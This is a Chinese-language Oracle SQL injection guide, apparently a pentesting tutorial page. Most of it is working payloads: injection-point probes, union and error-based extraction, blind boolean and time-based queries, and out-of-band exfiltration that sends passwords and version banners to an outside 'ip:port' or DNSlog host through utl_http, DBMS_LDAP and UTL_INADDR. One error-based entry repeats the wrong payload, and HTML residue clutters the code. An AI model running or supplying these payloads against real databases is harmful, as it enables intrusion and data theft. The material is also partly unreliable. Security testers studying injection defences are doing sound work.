Oracle 注入全面指南<\/h1>

0x01 寻找并判断注入点<\/h2>

数字型注入判断方法<\/h3>
使用不等号(<>)判断<\/strong><\/p>
?<\/span>id=<\/span>1<\/span>'+and+1<>6--+  # 返回为真，页面正常
<\/span><\/span><\/span>?id=1'<\/span>+<\/span>and<\/span>+<\/span>1<\/span><><\/span>1<\/span>--+  # 返回为假，页面异常
<\/span><\/span><\/span><\/code><\/pre><\/li>

使用加减法判断<\/strong><\/p>
?<\/span>id=<\/span>1<\/span>      #<\/span> 返回<\/span>id为<\/span>1<\/span>的内容<\/span>
<\/span><\/span>?<\/span>id=<\/span>2<\/span>-<\/span>1<\/span>    #<\/span> 返回为<\/span>1<\/span>的内容<\/span>
<\/span><\/span><\/code><\/pre><\/li>

通过数据库报错判断<\/strong><\/p>
?<\/span>id=<\/span>1<\/span>      #<\/span> 返回正常<\/span>
<\/span><\/span>?<\/span>id=<\/span>1<\/span>\/<\/span>0<\/span>    #<\/span> 返回异常<\/span>
<\/span><\/span><\/code><\/pre><\/li>

通过注释符判断<\/strong><\/p>
?<\/span>id=<\/span>1<\/span>              #<\/span> 返回正常<\/span>
<\/span><\/span>?<\/span>id=<\/span>1<\/span>\/*loecho*\/<\/span>    #<\/span> 也返回正常<\/span>
<\/span><\/span>?<\/span>id=<\/span>1<\/span>--loecho      # 也返回正常
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>
字符型注入判断方法<\/h3>


使用不等号(<>)判断<\/strong><\/p>
?<\/span>name=<\/span>loecho'+and+1<>6--+  # 返回正常
<\/span><\/span><\/span>?name=loecho'<\/span>+<\/span>and<\/span>+<\/span>1<\/span><><\/span>1<\/span>--+  # 返回异常
<\/span><\/span><\/span><\/code><\/pre><\/li>

使用字符串拼接符(||)判断<\/strong><\/p>
?<\/span>name=<\/span>lo'||'<\/span>echo  #<\/span> 返回正常<\/span>
<\/span><\/span>?<\/span>name=<\/span>lo'||'<\/span>haha  #<\/span> 返回异常<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x02 利用并查询数据<\/h2>
1. 联合查询<\/h3>


判断列数<\/strong><\/p>
?<\/span>id=<\/span>1<\/span>'+order+by+4--+  # 返回正常
<\/span><\/span><\/span>?id=1'<\/span>+<\/span>order<\/span>+<\/span>by<\/span>+<\/span>5<\/span>--+  # 提示报错
<\/span><\/span><\/span><\/code><\/pre><\/li>

判断列数据类型<\/strong><\/p>
?<\/span>id=<\/span>1<\/span>'+union+select+user+null+null+null+from+dual--+  # 查询当前用户名
<\/span><\/span><\/span><\/code><\/pre><\/li>

获取表名和列名<\/strong><\/p>
select<\/span> table_name<\/span> from<\/span> user_tables where<\/span> rownum=<\/span>1<\/span>  #<\/span> 获取表名<\/span>
<\/span><\/span>select<\/span> column_name<\/span> from<\/span> user_tab_columns where<\/span> table_name<\/span>=<\/span>'TB_USER'<\/span> and<\/span> rownum=<\/span>1<\/span>  #<\/span> 获取列名<\/span>
<\/span><\/span>select<\/span> USER_ID from<\/span> TB_USER where<\/span> USER_ID=<\/span>1<\/span> and<\/span> rownum=<\/span>1<\/span>  #<\/span> 获取数据<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2. 报错注入<\/h3>


XMLType()<\/strong><\/p>
upper<\/span>(XMLType(chr(60<\/span>)||<\/span>chr(58<\/span>)||<\/span>(select<\/span> user<\/span> from<\/span> dual)||<\/span>chr(62<\/span>)))
<\/span><\/span><\/code><\/pre><\/li>

dbms_xdb_version.checkin()<\/strong><\/p>
upper<\/span>(dbms_xdb_version.checkin((select<\/span> user<\/span> from<\/span> dual)))
<\/span><\/span><\/code><\/pre><\/li>

ctxsys.drithsx.sn()<\/strong><\/p>
upper<\/span>(dbms_xdb_version.checkin((select<\/span> user<\/span> from<\/span> dual)))
<\/span><\/span><\/code><\/pre><\/li>

ordsys.ord_dicom.getmappingxpath()<\/strong><\/p>
ordsys.ord_dicom.getmappingxpath(user<\/span>,user<\/span>,user<\/span>)
<\/span><\/span><\/code><\/pre><\/li>

dbms_utility.sqlid_to_sqlhash()<\/strong><\/p>
dbms_utility.sqlid_to_sqlhash((select<\/span> user<\/span> from<\/span> dual))
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3. OOB外带数据<\/h3>


HTTP请求外带数据<\/strong><\/p>
and<\/span> utl_http.request('http:\/\/ip:port\/'<\/span>||<\/span>(select<\/span> banner from<\/span> sys.v_$version where<\/span> rownum=<\/span>1<\/span>))=<\/span>1<\/span>--  # 查询指纹版
<\/span><\/span><\/span><\/span>and<\/span> utl_http.request('http:\/\/ip:port\/'<\/span>%<\/span>7<\/span>C<\/span>%<\/span>7<\/span>C<\/span>(select<\/span> SYS_CONTEXT ('USERENV'<\/span>, 'CURRENT_USER'<\/span>)from<\/span> dual))=<\/span>1<\/span>  #<\/span> 查询环境<\/span>
<\/span><\/span>and<\/span> utl_http.request('http:\/\/ip:port\/'<\/span>%<\/span>7<\/span>c<\/span>%<\/span>7<\/span>c<\/span> (select<\/span> user<\/span> from<\/span> dual))=<\/span>1<\/span>--  # 查询当前用户
<\/span><\/span><\/span><\/span>and<\/span> utl_http.request('http:\/\/ip:port\/'<\/span>||<\/span>(select<\/span> TABLE_NAME<\/span> from<\/span> all_tables where<\/span> rownum=<\/span>1<\/span>))=<\/span>1<\/span>--  # 查询所有数据表名
<\/span><\/span><\/span><\/code><\/pre><\/li>

DNSlog请求外带数据<\/strong><\/p>
select<\/span> name from<\/span> test_user where<\/span> id =<\/span>1<\/span> union<\/span> SELECT<\/span> UTL_HTTP.REQUEST((select<\/span> pass from<\/span> test_user where<\/span> id=<\/span>1<\/span>)||<\/span>'.dnslog'<\/span>) FROM<\/span> sys.DUAL;
<\/span><\/span>select<\/span> name from<\/span> test_user where<\/span> id =<\/span>1<\/span> union<\/span> SELECT<\/span> DBMS_LDAP.INIT((select<\/span> pass from<\/span> test_user where<\/span> id=<\/span>1<\/span>)||<\/span>'.dnslog'<\/span>,80<\/span>) FROM<\/span> sys.DUAL;
<\/span><\/span>select<\/span> name from<\/span> test_user where<\/span> id =<\/span>1<\/span> union<\/span> SELECT<\/span> HTTPURITYPE((select<\/span> pass from<\/span> test_user where<\/span> id=<\/span>1<\/span>)||<\/span>'.dnslog'<\/span>).GETCLOB() FROM<\/span> sys.DUAL;
<\/span><\/span>select<\/span> name from<\/span> test_user where<\/span> id =<\/span>1<\/span> union<\/span> SELECT<\/span> UTL_INADDR.GET_HOST_ADDRESS((select<\/span> pass from<\/span> test_user where<\/span> id=<\/span>1<\/span>)||<\/span>'.dnslog'<\/span>) FROM<\/span> sys.DUAL;
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4. 基于布尔值的盲注<\/h3>


使用substr()和decode()函数<\/strong><\/p>
and<\/span>+<\/span>1<\/span>=<\/span>(select<\/span>+<\/span>decode(substr((select<\/span> user<\/span> from<\/span> dual),§<\/span>1<\/span>§<\/span>,1<\/span>),'§S§'<\/span>,(1<\/span>),0<\/span>) from<\/span> dual)--+  # 查user
<\/span><\/span><\/span><\/span>and<\/span>+<\/span>1<\/span>=<\/span>(select<\/span> decode(substr((select<\/span> banner from<\/span> sys.v_$version wher rownum=<\/span>1<\/span>),1<\/span> ,1<\/span>),'S'<\/span>,(1<\/span>),0<\/span>) from<\/span> dual)--+  # 查version
<\/span><\/span><\/span><\/span>and<\/span>+<\/span>1<\/span>=<\/span>(select<\/span> decode(substr((select<\/span> table_name<\/span> from<\/span> user_tables where<\/span> rownum=<\/span>1<\/span>),§<\/span>1<\/span>§<\/span>,1<\/span>),'§S§'<\/span>,(1<\/span>),0<\/span>) from<\/span> dual)--+  # 查表名
<\/span><\/span><\/span><\/code><\/pre><\/li>

使用case、substr()和ascii()函数<\/strong><\/p>
123<\/span>=<\/span>(case<\/span> when<\/span> ascii(substr(user<\/span>,§<\/span>0<\/span>§<\/span>,1<\/span>))=<\/span>§<\/span>121<\/span>§<\/span> then<\/span> '123'<\/span> else<\/span> '456'<\/span> end<\/span>)--+
<\/span><\/span><\/span><\/code><\/pre><\/li>

使用case、instr()和chr()函数<\/strong><\/p>
123<\/span>=<\/span>(case<\/span> instr(user<\/span>,chr(§<\/span>*<\/span>§<\/span>),§<\/span>*<\/span>§<\/span>,1<\/span>) when<\/span> §<\/span>*<\/span>§<\/span> then<\/span> '123'<\/span> else<\/span> '456'<\/span> end<\/span>)--+
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>
5. 基于时间的盲注<\/h3>
'||decode(substr(user,§*§,1),chr(§*§),DBMS_PIPE.receive_message('<\/span>sen',1),2)||'<\/span>  #<\/span> 查<\/span>user<\/span>
<\/span><\/span><\/code><\/pre>0x03 实际案例分析<\/h2>


手工判断<\/strong><\/p>

条件为真时页面正常<\/li>
条件为假时页面异常<\/li>
<\/ul>
<\/li>

Payload示例<\/strong><\/p>
{"tel"<\/span>:"18848888888\/**\/and\/**\/1=(select\/**\/decode(substr((select\/**\/banner\/**\/from\/**\/sys.v_$version\/**\/where\/**\/rownum=1),1 ,1),'S',(1),0)\/**\/from\/**\/dual)"<\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x04 测试建议<\/h2>

着重测试微应用的后端交互或后端API<\/li>
只要成功判断后端执行了拼接的SQL语句，就存在问题<\/li>
搜索处、表单提交等各类可能有后端交互的地方都应测试<\/li>
配合数据库特性如1\/0也可以进行测试<\/li>
<\/ol>
常用Oracle查询语句<\/h2>


查询数据库信息<\/strong><\/p>
select<\/span> name from<\/span> v$database;
<\/span><\/span>select<\/span> instance_name from<\/span> v$instance;
<\/span><\/span><\/code><\/pre><\/li>

查询所有表空间<\/strong><\/p>
select<\/span> *<\/span> from<\/span> v$tablespace;
<\/span><\/span><\/code><\/pre><\/li>

查询当前数据库中所有表名<\/strong><\/p>
select<\/span> *<\/span> from<\/span> user_tables;
<\/span><\/span><\/code><\/pre><\/li>

查询指定表中的所有字段名<\/strong><\/p>
select<\/span> column_name<\/span> from<\/span> user_tab_columns where<\/span> table_name<\/span> =<\/span> 'table_name'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>

查询指定表中的字段名和类型<\/strong><\/p>
select<\/span> column_name<\/span>, data_type from<\/span> user_tab_columns where<\/span> table_name<\/span> =<\/span> 'table_name'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>